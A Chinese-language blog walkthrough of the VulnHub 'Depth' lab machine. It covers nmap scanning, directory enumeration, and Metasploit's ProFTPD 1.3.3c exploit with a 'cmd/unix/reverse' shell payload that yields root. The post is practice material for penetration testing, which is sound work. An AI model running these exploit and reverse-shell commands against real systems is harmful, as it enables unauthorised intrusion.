下载地址:https://download.vulnhub.com/depth/DepthB2R.ova
一、靶场配置
网卡模式设置为nat
二、主机探测与端口扫描
nmap 192.168.121.0/24
ip地址为192.168.121.186,开启了21、22、80端口
扫描一下端口信息
nmap 192.168.121.186 -sV -A -p-
访问一下80web服务看看
三、get shell
提示没有添加任何内容
目录扫描看看
dirb http://192.168.121.186
无可用信息,我们想起来之前扫描端口信息的时候,开启的ftp服务版本貌似有漏洞
使用msfconsole查看
msfconsole
search ProFTPD
使用第五个,1.3.3c
use5
show options
设置RHOSTS为靶机ip地址
set RHOSTS 192.168.121.186
设置payload
set payload cmd/unix/reverse
再次查看配置信息,发现还需要设置监听地址
我们设置为kali的ip
输入run开始攻击
攻击成功,成功拿到root权限,省了提权这一步
标签:121.186,ip,端口,192.168,pentesting,地址,设置,basic,靶场 From: https://blog.csdn.net/weixin_68615160/article/details/140934009